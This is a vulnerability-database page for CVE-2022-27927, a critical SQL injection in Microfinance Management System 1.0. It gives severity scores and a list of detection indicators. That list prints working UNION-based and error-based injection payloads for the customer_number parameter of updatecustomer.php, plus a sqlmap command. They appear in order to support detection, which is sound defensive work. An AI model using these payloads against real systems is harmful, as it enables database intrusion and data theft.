cbcvebase.
CVE-2022-27927
published 2022-04-19

CVE-2022-27927: A SQL injection vulnerability exists in Microfinance Management System 1.0 when MySQL is being used as the application database. An attacker can issue SQL…

PriorityP269critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
13.63%
96.0th percentile
A SQL injection vulnerability exists in Microfinance Management System 1.0 when MySQL is being used as the application database. An attacker can issue SQL commands to the MySQL database through the vulnerable course_code and/or customer_number parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
microfinance_management_system_projectmicrofinance_management_system

Detection & IOCsextracted from sources · hover to see the quote

url/mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL'
url/mims/updatecustomer.php?customer_number=-1%27%20and%206%3d3%20or%201%3d1%2b(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)%2b%27
path/mims/updatecustomer.php
commandsqlmap.py -r poc.txt --dbms=mysql
commandcustomer_number=-5361' OR 1 GROUP BY CONCAT(0x716a786271,(SELECT (CASE WHEN (6766=6766) THEN 1 ELSE 0 END)),0x7171716a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
  • Detect SQL injection attempts against the vulnerable endpoint by monitoring GET requests to /mims/updatecustomer.php with a manipulated 'customer_number' parameter containing SQL metacharacters or UNION/SELECT payloads.
  • The Nuclei template matcher checks for the md5 of '999999999' in the HTTP response body from /mims/updatecustomer.php, which confirms successful UNION-based SQL injection exploitation.
  • Monitor HTTP Referer header value 'http://localhost/mims/managecustomer.php' combined with SQLi payloads in the customer_number parameter as an indicator of exploitation attempts originating from the manage customer page.
  • Error-based SQLi payloads targeting this CVE use INFORMATION_SCHEMA.COLLATIONS with FLOOR(RAND(0)*2) and GROUP BY to trigger MySQL errors; alert on these patterns in query strings to /mims/updatecustomer.php.
  • ·The CVE also affects the 'course_code' parameter in addition to 'customer_number'; detection rules should cover both parameters.
  • ·The Nuclei template uses a single GET request (max-request: 1) targeting /mims/updatecustomer.php with a UNION-based payload; detection tuned only for this endpoint may miss exploitation via other vulnerable parameters or endpoints.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.